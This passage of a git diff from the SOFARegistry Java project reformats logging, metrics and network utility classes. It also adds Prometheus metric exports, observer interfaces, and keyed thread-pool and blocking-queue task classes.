logger.isTraceEnabled(); + } - @Override - public boolean isTraceEnabled() { - return logger.isTraceEnabled(); - } + @Override + public boolean isDebugEnabled() { + return logger.isDebugEnabled(); + } - @Override - public boolean isDebugEnabled() { - return logger.isDebugEnabled(); - } + @Override + public boolean isInfoEnabled() { + return logger.isInfoEnabled(); + } - @Override - public boolean isInfoEnabled() { - return logger.isInfoEnabled(); - } + @Override + public boolean isWarnEnabled() { + return logger.isWarnEnabled(); + } - @Override - public boolean isWarnEnabled() { - return logger.isWarnEnabled(); - } + @Override + public boolean isErrorEnabled() { + return logger.isErrorEnabled(); + } - @Override - public boolean isErrorEnabled() { - return logger.isErrorEnabled(); + private String processMsg(String msg) { + if (msgPrefix.isEmpty()) { + return msg; } + return msgPrefix + SPACE + msg; + } - private String processMsg(String msg) { - if (msgPrefix.isEmpty()) { - return msg; - } - return msgPrefix + SPACE + msg; - } - - @Override - public Object getLogger() { - return logger; - } -} \ No newline at end of file + @Override + public Object getLogger() { + return logger; + } +} diff --git a/server/common/util/src/main/java/com/alipay/sofa/registry/metrics/ReporterUtils.java b/server/common/util/src/main/java/com/alipay/sofa/registry/metrics/ReporterUtils.java index fb5f24e36..14dfaea77 100644 --- a/server/common/util/src/main/java/com/alipay/sofa/registry/metrics/ReporterUtils.java +++ b/server/common/util/src/main/java/com/alipay/sofa/registry/metrics/ReporterUtils.java @@ -17,33 +17,59 @@ package com.alipay.sofa.registry.metrics; import com.alipay.sofa.registry.log.Logger; +import com.alipay.sofa.registry.log.LoggerFactory; import com.codahale.metrics.MetricRegistry; import com.codahale.metrics.Slf4jReporter; - +import io.prometheus.client.CollectorRegistry; +import io.prometheus.client.dropwizard.DropwizardExports; +import io.prometheus.client.hotspot.DefaultExports; import java.util.concurrent.TimeUnit; /** - * * @author shangyu.wh * @version $Id: ReporterUtils.java, v 0.1 2018-08-23 13:25 shangyu.wh Exp $ */ public class ReporterUtils { - /** - * start slf4j reporter - * @param period - * @param registry - * @param loggerMetrics - */ - public static void startSlf4jReporter(long period, MetricRegistry registry, Logger loggerMetrics) { - Slf4jReporter reporter = Slf4jReporter.forRegistry(registry) - .outputTo((org.slf4j.Logger) loggerMetrics.getLogger()) - .convertRatesTo(TimeUnit.SECONDS).convertDurationsTo(TimeUnit.MILLISECONDS).build(); - if (period > 0) { - reporter.start(period, TimeUnit.SECONDS); - } else { - reporter.start(30, TimeUnit.SECONDS); - } + private static final Logger METRIC_LOGGER = LoggerFactory.getLogger("REGISTRY-METRICS"); + /** + * start slf4j reporter + * + * @param period + * @param registry + * @param loggerMetrics + */ + public static void startSlf4jReporter( + long period, MetricRegistry registry, Logger loggerMetrics) { + Slf4jReporter reporter = + Slf4jReporter.forRegistry(registry) + .outputTo((org.slf4j.Logger) loggerMetrics.getLogger()) + .convertRatesTo(TimeUnit.SECONDS) + .convertDurationsTo(TimeUnit.MILLISECONDS) + .build(); + if (period > 0) { + reporter.start(period, TimeUnit.SECONDS); + } else { + reporter.start(30, TimeUnit.SECONDS); } -} \ No newline at end of file + } + + /** + * start slf4j reporter + * + * @param period + * @param registry + */ + public static void startSlf4jReporter(long period, MetricRegistry registry) { + startSlf4jReporter(period, registry, METRIC_LOGGER); + } + + public static void enablePrometheusDefaultExports() { + DefaultExports.initialize(); + } + + public static void registerPrometheusMetrics(MetricRegistry metrics) { + CollectorRegistry.defaultRegistry.register(new DropwizardExports(metrics)); + } +} diff --git a/server/common/util/src/main/java/com/alipay/sofa/registry/metrics/TaskMetrics.java b/server/common/util/src/main/java/com/alipay/sofa/registry/metrics/TaskMetrics.java index ae0ec816c..115a57f0a 100644 --- a/server/common/util/src/main/java/com/alipay/sofa/registry/metrics/TaskMetrics.java +++ b/server/common/util/src/main/java/com/alipay/sofa/registry/metrics/TaskMetrics.java @@ -16,58 +16,62 @@ */ package com.alipay.sofa.registry.metrics; +import com.alipay.sofa.registry.log.Logger; +import com.alipay.sofa.registry.log.LoggerFactory; import com.codahale.metrics.Gauge; +import com.codahale.metrics.Metric; import com.codahale.metrics.MetricRegistry; - +import java.util.Map; import java.util.concurrent.ThreadPoolExecutor; /** - * * @author shangyu.wh * @version $Id: ThreadMetrics.java, v 0.1 2018-11-18 15:19 shangyu.wh Exp $ */ public class TaskMetrics { + private static final Logger LOGGER = LoggerFactory.getLogger(TaskMetrics.class); - private final MetricRegistry metrics; - - private TaskMetrics() { - this.metrics = new MetricRegistry(); - } + private final MetricRegistry metrics = new MetricRegistry(); - private volatile static TaskMetrics instance; + private TaskMetrics() {} - public static TaskMetrics getInstance() { - if (instance == null) { - synchronized (TaskMetrics.class) { - if (instance == null) { - instance = new TaskMetrics(); - } - } - } + private static final TaskMetrics instance = new TaskMetrics(); - return instance; - } + public static TaskMetrics getInstance() { + return instance; + } - public MetricRegistry getMetricRegistry() { - return this.metrics; - } + public MetricRegistry getMetricRegistry() { + return this.metrics; + } - public void registerThreadExecutor(String executorName, ThreadPoolExecutor executor) { + public void registerThreadExecutor(String executorName, ThreadPoolExecutor executor) { - metrics.register(MetricRegistry.name(executorName, "queue"), - (Gauge) () -> executor.getQueue().size()); + registerIfAbsent( + MetricRegistry.name(executorName, "queue"), + (Gauge) () -> executor.getQueue().size()); - metrics.register(MetricRegistry.name(executorName, "current"), - (Gauge) executor::getPoolSize); + registerIfAbsent( + MetricRegistry.name(executorName, "current"), (Gauge) executor::getPoolSize); - metrics.register(MetricRegistry.name(executorName, "active"), - (Gauge) executor::getActiveCount); + registerIfAbsent( + MetricRegistry.name(executorName, "active"), (Gauge) executor::getActiveCount); - metrics.register(MetricRegistry.name(executorName, "completed"), - (Gauge) executor::getCompletedTaskCount); + registerIfAbsent( + MetricRegistry.name(executorName, "completed"), + (Gauge) executor::getCompletedTaskCount); - metrics.register(MetricRegistry.name(executorName, "task"), - (Gauge) executor::getTaskCount); + registerIfAbsent( + MetricRegistry.name(executorName, "task"), (Gauge) executor::getTaskCount); + } + private boolean registerIfAbsent(String executorName, Metric metric) { + Map metricMap = metrics.getMetrics(); + if (metricMap.containsKey(executorName)) { + LOGGER.warn("executor.metric exists {}", executorName); + return false; } -} \ No newline at end of file + metrics.register(executorName, metric); + return true; + } +} diff --git a/server/common/util/src/main/java/com/alipay/sofa/registry/net/NetUtil.java b/server/common/util/src/main/java/com/alipay/sofa/registry/net/NetUtil.java index 9c18e10a3..8dbcc6a75 100644 --- a/server/common/util/src/main/java/com/alipay/sofa/registry/net/NetUtil.java +++ b/server/common/util/src/main/java/com/alipay/sofa/registry/net/NetUtil.java @@ -18,7 +18,6 @@ import com.alipay.sofa.registry.log.Logger; import com.alipay.sofa.registry.log.LoggerFactory; - import java.net.InetAddress; import java.net.InetSocketAddress; import java.net.NetworkInterface; @@ -31,187 +30,178 @@ /** * The type Net util. + * * @author shangyu.wh * @version $Id : NetUtil.java, v 0.1 2017-11-22 12:13 shangyu.wh Exp $ */ public class NetUtil { - private static final Logger LOGGER = LoggerFactory - .getLogger(NetUtil.class); - - /** - * The constant LOCALHOST. - */ - public static final String LOCALHOST = "127.0.0.1"; - - /** - * The constant ANYHOST. - */ - public static final String ANYHOST = "0.0.0.0"; - - /** symbol : */ - public static final char COLON = ':'; - - private static volatile InetAddress LOCAL_ADDRESS = null; - - private static final Pattern IP_PATTERN = Pattern - .compile("\\d{1,3}(\\.\\d{1,3}){3,5}$"); - - public static final String NETWORK_INTERFACE_BINDING = "network_interface_binding"; - public static final String NETWORK_INTERFACE_BINDING_VALUE = System - .getProperty(NETWORK_INTERFACE_BINDING); - public static final String NETWORK_INTERFACE_DENYLIST = "network_interface_denylist"; - public static final List NETWORK_INTERFACE_DENYLIST_VALUE = System - .getProperty(NETWORK_INTERFACE_DENYLIST) == null ? Collections - .emptyList() - : Arrays - .asList(System - .getProperty( - NETWORK_INTERFACE_DENYLIST) - .split(",")); - - /** - * Gen host string. - * - * @param ip the ip - * @param port the port - * @return the string - */ - public static String genHost(String ip, int port) { - return ip + COLON + port; - } - - /** - * Gets local socket address. - * - * @return the local socket address - */ - public static InetSocketAddress getLocalSocketAddress() { - InetAddress address = getLocalAddress(); - String addressStr = address == null ? LOCALHOST : address.getHostAddress(); - return new InetSocketAddress(addressStr, 0); - } - - /** - * Gets ip address from domain. - * - * @param domain the domain - * @return the ip address from domain - */ - public static String getIPAddressFromDomain(String domain) { - try { - InetAddress a = InetAddress.getByName(domain); - if (LOCALHOST.equalsIgnoreCase(a.getHostAddress())) { - a = getLocalAddress(); - } - return a.getHostAddress(); - } catch (UnknownHostException e) { - throw new RuntimeException("Unknown host {" + domain + "}"); - } + private static final Logger LOGGER = LoggerFactory.getLogger(NetUtil.class); + + /** The constant LOCALHOST. */ + public static final String LOCALHOST = "127.0.0.1"; + + /** The constant ANYHOST. */ + public static final String ANYHOST = "0.0.0.0"; + + /** symbol : */ + public static final char COLON = ':'; + + private static volatile InetAddress LOCAL_ADDRESS = null; + + private static final Pattern IP_PATTERN = Pattern.compile("\\d{1,3}(\\.\\d{1,3}){3,5}$"); + + public static final String NETWORK_INTERFACE_BINDING = "network_interface_binding"; + public static final String NETWORK_INTERFACE_BINDING_VALUE = + System.getProperty(NETWORK_INTERFACE_BINDING); + public static final String NETWORK_INTERFACE_DENYLIST = "network_interface_denylist"; + public static final List NETWORK_INTERFACE_DENYLIST_VALUE = + System.getProperty(NETWORK_INTERFACE_DENYLIST) == null + ? Collections.emptyList() + : Arrays.asList(System.getProperty(NETWORK_INTERFACE_DENYLIST).split(",")); + + /** + * Gen host string. + * + * @param ip the ip + * @param port the port + * @return the string + */ + public static String genHost(String ip, int port) { + return ip + COLON + port; + } + + /** + * Gets local socket address. + * + * @return the local socket address + */ + public static InetSocketAddress getLocalSocketAddress() { + InetAddress address = getLocalAddress(); + String addressStr = address == null ? LOCALHOST : address.getHostAddress(); + return new InetSocketAddress(addressStr, 0); + } + + /** + * Gets ip address from domain. + * + * @param domain the domain + * @return the ip address from domain + */ + public static String getIPAddressFromDomain(String domain) { + try { + InetAddress a = InetAddress.getByName(domain); + if (LOCALHOST.equalsIgnoreCase(a.getHostAddress())) { + a = getLocalAddress(); + } + return a.getHostAddress(); + } catch (UnknownHostException e) { + throw new RuntimeException("Unknown host {" + domain + "}", e); } - - /** - * - * @param ip - * @return String - */ - public static String getDomainFromIP(String ip) { - try { - InetAddress a = InetAddress.getByName(ip); - return a.getCanonicalHostName(); - } catch (UnknownHostException e) { - LOGGER.error("[NetWorkUtils] Can not resolve ip " + ip + ". error is .", e); - } - return null; + } + + /** + * @param ip + * @return String + */ + public static String getDomainFromIP(String ip) { + try { + InetAddress a = InetAddress.getByName(ip); + return a.getCanonicalHostName(); + } catch (UnknownHostException e) { + LOGGER.error("[NetWorkUtils] Can not resolve ip " + ip + ". error is .", e); } - - /** - * Gets local address. - * - * @return loccal IP all network card - */ - public static InetAddress getLocalAddress() { - if (LOCAL_ADDRESS != null) { - return LOCAL_ADDRESS; - } - InetAddress localAddress = getLocalAddress0(); - LOCAL_ADDRESS = localAddress; - return localAddress; + return null; + } + + /** + * Gets local address. + * + * @return loccal IP all network card + */ + public static InetAddress getLocalAddress() { + if (LOCAL_ADDRESS != null) { + return LOCAL_ADDRESS; } - - /** - * To address string string. - * - * @param address the address - * @return the string - */ - public static String toAddressString(InetSocketAddress address) { - if (address == null || address.getAddress() == null) { - LOGGER - .error("InetSocketAddress to Address String error!In put inetSocketAddress or InetSocketAddress.getAddress is null"); - throw new RuntimeException( - "InetSocketAddress to Address String error!In put inetSocketAddress or InetSocketAddress.getAddress is null!"); - } - return address.getAddress().getHostAddress() + COLON + address.getPort(); + InetAddress localAddress = getLocalAddress0(); + LOCAL_ADDRESS = localAddress; + return localAddress; + } + + /** + * To address string string. + * + * @param address the address + * @return the string + */ + public static String toAddressString(InetSocketAddress address) { + if (address == null || address.getAddress() == null) { + LOGGER.error( + "InetSocketAddress to Address String error!In put inetSocketAddress or InetSocketAddress.getAddress is null"); + throw new RuntimeException( + "InetSocketAddress to Address String error!In put inetSocketAddress or InetSocketAddress.getAddress is null!"); } + return address.getAddress().getHostAddress() + COLON + address.getPort(); + } - private static boolean isValidAddress(InetAddress address) { - if (address == null || address.isLoopbackAddress()) { - return false; - } - String name = address.getHostAddress(); - return (name != null && !ANYHOST.equals(name) && !LOCALHOST.equals(name) && IP_PATTERN - .matcher(name).matches()); + private static boolean isValidAddress(InetAddress address) { + if (address == null || address.isLoopbackAddress()) { + return false; } + String name = address.getHostAddress(); + return (name != null + && !ANYHOST.equals(name) + && !LOCALHOST.equals(name) + && IP_PATTERN.matcher(name).matches()); + } + + private static InetAddress getLocalAddress0() { + InetAddress localAddress = null; + try { + Enumeration interfaces = NetworkInterface.getNetworkInterfaces(); + if (interfaces != null) { + while (interfaces.hasMoreElements()) { + try { + NetworkInterface network = interfaces.nextElement(); + boolean useNi; + if (NETWORK_INTERFACE_BINDING_VALUE != null + && !NETWORK_INTERFACE_BINDING_VALUE.isEmpty()) { + if (NETWORK_INTERFACE_BINDING_VALUE.equals(network.getDisplayName()) + || NETWORK_INTERFACE_BINDING_VALUE.equals(network.getName())) { + useNi = true; + } else { + continue; + } + } else { + if (NETWORK_INTERFACE_DENYLIST_VALUE.contains(network.getDisplayName()) + || NETWORK_INTERFACE_DENYLIST_VALUE.contains(network.getName())) { + continue; + } + useNi = true; + } - private static InetAddress getLocalAddress0() { - InetAddress localAddress = null; - try { - Enumeration interfaces = NetworkInterface.getNetworkInterfaces(); - if (interfaces != null) { - while (interfaces.hasMoreElements()) { - try { - NetworkInterface network = interfaces.nextElement(); - boolean useNi; - if (NETWORK_INTERFACE_BINDING_VALUE != null - && !NETWORK_INTERFACE_BINDING_VALUE.isEmpty()) { - if (NETWORK_INTERFACE_BINDING_VALUE.equals(network.getDisplayName()) - || NETWORK_INTERFACE_BINDING_VALUE.equals(network.getName())) { - useNi = true; - } else { - continue; - } - } else { - if (NETWORK_INTERFACE_DENYLIST_VALUE.contains(network.getDisplayName()) - || NETWORK_INTERFACE_DENYLIST_VALUE.contains(network.getName())) { - continue; - } - useNi = true; - } - - Enumeration addresses = network.getInetAddresses(); - if (addresses != null) { - while (addresses.hasMoreElements()) { - try { - InetAddress address = addresses.nextElement(); - if (useNi && isValidAddress(address)) { - return address; - } - } catch (Throwable e) { - LOGGER.warn( - "Failed to retriving ip address, " + e.getMessage(), e); - } - } - } - } catch (Throwable e) { - LOGGER.warn("Failed to retriving ip address, " + e.getMessage(), e); - } + Enumeration addresses = network.getInetAddresses(); + if (addresses != null) { + while (addresses.hasMoreElements()) { + try { + InetAddress address = addresses.nextElement(); + if (useNi && isValidAddress(address)) { + return address; + } + } catch (Throwable e) { + LOGGER.warn("Failed to retriving ip address, " + e.getMessage(), e); } + } } - } catch (Throwable e) { + } catch (Throwable e) { LOGGER.warn("Failed to retriving ip address, " + e.getMessage(), e); + } } - LOGGER.error("Could not get local host ip address, will use 127.0.0.1 instead."); - return localAddress; + } + } catch (Throwable e) { + LOGGER.warn("Failed to retriving ip address, " + e.getMessage(), e); } -} \ No newline at end of file + LOGGER.error("Could not get local host ip address, will use 127.0.0.1 instead."); + return localAddress; + } +} diff --git a/server/common/util/src/main/java/com/alipay/sofa/registry/observer/Observable.java b/server/common/util/src/main/java/com/alipay/sofa/registry/observer/Observable.java new file mode 100644 index 000000000..bf32f001d --- /dev/null +++ b/server/common/util/src/main/java/com/alipay/sofa/registry/observer/Observable.java @@ -0,0 +1,28 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.observer; + +/** + * @author zhuchen + * @date Nov 25, 2020, 11:16:14 AM + */ +public interface Observable { + + void addObserver(UnblockingObserver observer); + + void removeObserver(UnblockingObserver observer); +} diff --git a/server/common/util/src/main/java/com/alipay/sofa/registry/observer/UnblockingObserver.java b/server/common/util/src/main/java/com/alipay/sofa/registry/observer/UnblockingObserver.java new file mode 100644 index 000000000..5bce5de38 --- /dev/null +++ b/server/common/util/src/main/java/com/alipay/sofa/registry/observer/UnblockingObserver.java @@ -0,0 +1,26 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.observer; + +/** + * @author zhuchen + * @date Nov 25, 2020, 11:16:20 AM + */ +public interface UnblockingObserver { + + void update(Observable source, Object message); +} diff --git a/server/common/util/src/main/java/com/alipay/sofa/registry/observer/impl/AbstractLifecycleObservable.java b/server/common/util/src/main/java/com/alipay/sofa/registry/observer/impl/AbstractLifecycleObservable.java new file mode 100644 index 000000000..a66498ec4 --- /dev/null +++ b/server/common/util/src/main/java/com/alipay/sofa/registry/observer/impl/AbstractLifecycleObservable.java @@ -0,0 +1,64 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.observer.impl; + +import com.alipay.sofa.registry.lifecycle.Lifecycle; +import com.alipay.sofa.registry.lifecycle.LifecycleController; +import com.alipay.sofa.registry.lifecycle.LifecycleState; +import com.alipay.sofa.registry.lifecycle.impl.AbstractLifecycle; +import com.alipay.sofa.registry.observer.Observable; +import com.alipay.sofa.registry.observer.UnblockingObserver; +import java.util.List; +import java.util.concurrent.CopyOnWriteArrayList; + +/** + * @author chen.zhu + *

Nov 25, 2020 + */ +public class AbstractLifecycleObservable extends AbstractLifecycle + implements Observable, Lifecycle { + + final List observers = new CopyOnWriteArrayList<>(); + + public AbstractLifecycleObservable() {} + + public AbstractLifecycleObservable( + LifecycleState lifecycleState, LifecycleController lifecycleController) { + super(lifecycleState, lifecycleController); + } + + @Override + public void addObserver(UnblockingObserver observer) { + observers.add(observer); + } + + @Override + public void removeObserver(UnblockingObserver observer) { + observers.remove(observer); + } + + protected void notifyObservers(final Object message) { + + for (final Object observer : observers) { + try { + ((UnblockingObserver) observer).update(AbstractLifecycleObservable.this, message); + } catch (Throwable e) { + logger.error("[notifyObservers][{}]", observer, e); + } + } + } +} diff --git a/server/common/util/src/main/java/com/alipay/sofa/registry/task/BlockingQueues.java b/server/common/util/src/main/java/com/alipay/sofa/registry/task/BlockingQueues.java new file mode 100644 index 000000000..ea729107e --- /dev/null +++ b/server/common/util/src/main/java/com/alipay/sofa/registry/task/BlockingQueues.java @@ -0,0 +1,83 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.task; + +import java.util.concurrent.ArrayBlockingQueue; +import java.util.concurrent.BlockingQueue; +import java.util.concurrent.LinkedBlockingQueue; + +public final class BlockingQueues { + private final BlockingQueue[] queues; + private final int avgQueueBufferSize; + private final int queueBufferSize; + private final int queueNum; + + public BlockingQueues(int queueNum, int queueBufferSize, boolean array) { + this.queueNum = queueNum; + this.queues = new BlockingQueue[queueNum]; + for (int i = 0; i < queueNum; i++) { + // safeguard: set the queue.capacity as queueSize + this.queues[i] = + array + ? new ArrayBlockingQueue<>(queueBufferSize) + : new LinkedBlockingQueue<>(queueBufferSize); + } + // at most, cache double req + this.avgQueueBufferSize = queueBufferSize / queueNum; + this.queueBufferSize = queueBufferSize; + } + + public boolean offer(int idx, T t) { + BlockingQueue q = queues[idx]; + if (q.size() < avgQueueBufferSize) { + // not reach avg, add + return q.offer(t); + } else { + // reach avg, check total size + int totalSize = getTotalQueueSize(); + if (totalSize < queueBufferSize) { + return q.offer(t); + } + return false; + } + } + + public void put(int idx, T t) { + if (!offer(idx, t)) { + throw new FastRejectedExecutionException( + String.format( + "BlockingQueues.put overflow, idx=%d, totalSize=%d, queueSize=%d", + idx, getTotalQueueSize(), queues[idx].size())); + } + } + + public BlockingQueue getQueue(int idx) { + return queues[idx]; + } + + public int queueNum() { + return queueNum; + } + + public int getTotalQueueSize() { + int count = 0; + for (BlockingQueue q : queues) { + count += q.size(); + } + return count; + } +} diff --git a/server/common/util/src/main/java/com/alipay/sofa/registry/task/FastRejectedExecutionException.java b/server/common/util/src/main/java/com/alipay/sofa/registry/task/FastRejectedExecutionException.java new file mode 100644 index 000000000..f3306eaf8 --- /dev/null +++ b/server/common/util/src/main/java/com/alipay/sofa/registry/task/FastRejectedExecutionException.java @@ -0,0 +1,31 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.task; + +import java.util.concurrent.RejectedExecutionException; + +public class FastRejectedExecutionException extends RejectedExecutionException { + public FastRejectedExecutionException(String message) { + super(message); + } + + @Override + public Throwable fillInStackTrace() { + // not fill the stack trace + return this; + } +} diff --git a/server/common/util/src/main/java/com/alipay/sofa/registry/task/KeyedTask.java b/server/common/util/src/main/java/com/alipay/sofa/registry/task/KeyedTask.java new file mode 100644 index 000000000..ea7e3911f --- /dev/null +++ b/server/common/util/src/main/java/com/alipay/sofa/registry/task/KeyedTask.java @@ -0,0 +1,117 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.task; + +import com.alipay.sofa.registry.log.Logger; +import com.alipay.sofa.registry.log.LoggerFactory; + +public class KeyedTask implements Runnable { + private static final Logger LOGGER = LoggerFactory.getLogger(KeyedTask.class); + final long createTime = System.currentTimeMillis(); + final Object key; + final T runnable; + + volatile long startTime; + volatile long endTime; + volatile boolean success; + volatile boolean canceled; + + KeyedTask(Object key, T runnable) { + this.key = key; + this.runnable = runnable; + } + + public void cancel() { + this.canceled = true; + } + + @Override + public void run() { + try { + this.startTime = System.currentTimeMillis(); + if (!canceled) { + runnable.run(); + } + this.success = true; + } catch (TaskErrorSilenceException ignored) { + LOGGER.debug("failed to run task {}, {}", key, runnable); + } catch (Throwable e) { + LOGGER.error("failed to run task {}, {}", key, runnable, e); + } finally { + this.endTime = System.currentTimeMillis(); + } + } + + public boolean isFinished() { + return this.endTime > 0; + } + + public boolean isSuccess() { + return isFinished() && success; + } + + public boolean isFailed() { + return isFinished() && !success; + } + + public long getCreateTime() { + return createTime; + } + + public long getStartTime() { + return startTime; + } + + public long getEndTime() { + return endTime; + } + + public Object key() { + return key; + } + + public T getRunnable() { + return runnable; + } + + public boolean isOverAfter(int intervalMs) { + if (!isFinished()) { + return false; + } + return canceled || System.currentTimeMillis() - endTime >= intervalMs; + } + + @Override + public String toString() { + return "KeyedTask{" + + "createTime=" + + createTime + + ", key=" + + key + + ", runnable=" + + runnable + + ", startTime=" + + startTime + + ", endTime=" + + endTime + + ", success=" + + success + + ", canceled=" + + canceled + + '}'; + } +} diff --git a/server/common/util/src/main/java/com/alipay/sofa/registry/task/KeyedThreadPoolExecutor.java b/server/common/util/src/main/java/com/alipay/sofa/registry/task/KeyedThreadPoolExecutor.java new file mode 100644 index 000000000..d42055946 --- /dev/null +++ b/server/common/util/src/main/java/com/alipay/sofa/registry/task/KeyedThreadPoolExecutor.java @@ -0,0 +1,151 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.task; + +import com.alipay.sofa.registry.log.Logger; +import com.alipay.sofa.registry.log.LoggerFactory; +import com.alipay.sofa.registry.util.ConcurrentUtils; +import io.prometheus.client.Counter; +import java.util.concurrent.BlockingQueue; +import java.util.concurrent.TimeUnit; + +/** + * thread unsafe, could not use concurrently + * + * @author yuzhi.lyz + * @version v 0.1 2020-12-15 13:38 yuzhi.lyz Exp $ + */ +public class KeyedThreadPoolExecutor { + private static final Logger LOGGER = LoggerFactory.getLogger(KeyedThreadPoolExecutor.class); + private final AbstractWorker[] workers; + protected final String executorName; + protected final int coreBufferSize; + + private final Counter taskCounter; + + public KeyedThreadPoolExecutor(String executorName, int coreSize, int coreBufferSize) { + this.executorName = executorName; + this.coreBufferSize = coreBufferSize; + this.taskCounter = + Counter.build() + .namespace("keyedExecutor") + .help("metrics for keyed executor") + .name(executorName.replace('-', '_') + "_task_total") + .labelNames("idx", "type") + .register(); + + workers = createWorkers(coreSize, coreBufferSize); + for (int i = 0; i < coreSize; i++) { + ConcurrentUtils.createDaemonThread(executorName + "_" + i, workers[i]).start(); + } + } + + protected AbstractWorker[] createWorkers(int coreSize, int coreBufferSize) { + BlockingQueues queues = new BlockingQueues<>(coreSize, coreBufferSize, false); + AbstractWorker[] workers = new AbstractWorker[coreSize]; + for (int i = 0; i < coreSize; i++) { + workers[i] = new WorkerImpl(i, queues); + } + return workers; + } + + protected interface Worker extends Runnable { + int size(); + + KeyedTask poll() throws InterruptedException; + + boolean offer(KeyedTask task); + } + + private final class WorkerImpl extends AbstractWorker { + final BlockingQueues queues; + final BlockingQueue queue; + + WorkerImpl(int idx, BlockingQueues queues) { + super(idx); + this.queues = queues; + this.queue = queues.getQueue(idx); + } + + public int size() { + return queue.size(); + } + + public KeyedTask poll() throws InterruptedException { + return queue.poll(180, TimeUnit.SECONDS); + } + + public boolean offer(KeyedTask task) { + return queues.offer(idx, task); + } + } + + protected abstract class AbstractWorker implements Worker { + final int idx; + final Counter.Child workerExecCounter; + final Counter.Child workerCommitCounter; + + protected AbstractWorker(int idx) { + this.idx = idx; + this.workerExecCounter = taskCounter.labels(String.valueOf(idx), "exec"); + this.workerCommitCounter = taskCounter.labels(String.valueOf(idx), "commit"); + } + + @Override + public void run() { + for (; ; ) { + try { + final KeyedTask task = poll(); + if (task == null) { + LOGGER.info("{}_{} idle", executorName, idx); + continue; + } + task.run(); + workerExecCounter.inc(); + } catch (Throwable e) { + LOGGER.error("{}_{} run task error", executorName, idx, e); + } + } + } + } + + protected int getQueueSize() { + int size = 0; + for (Worker w : workers) { + size += w.size(); + } + return size; + } + + public KeyedTask execute(Object key, T runnable) { + KeyedTask task = new KeyedTask(key, runnable); + AbstractWorker w = workerOf(key); + // should not happen, + if (!w.offer(task)) { + throw new FastRejectedExecutionException( + String.format( + "%s_%d full, max=%d, now=%d", executorName, w.idx, coreBufferSize, w.size())); + } + w.workerCommitCounter.inc(); + return task; + } + + private AbstractWorker workerOf(Object key) { + int n = (key.hashCode() & 0x7fffffff) % workers.length; + return workers[n]; + } +} diff --git a/server/common/util/src/main/java/com/alipay/sofa/registry/task/MetricsableThreadPoolExecutor.java b/server/common/util/src/main/java/com/alipay/sofa/registry/task/MetricsableThreadPoolExecutor.java new file mode 100644 index 000000000..82bba0b0f --- /dev/null +++ b/server/common/util/src/main/java/com/alipay/sofa/registry/task/MetricsableThreadPoolExecutor.java @@ -0,0 +1,95 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF 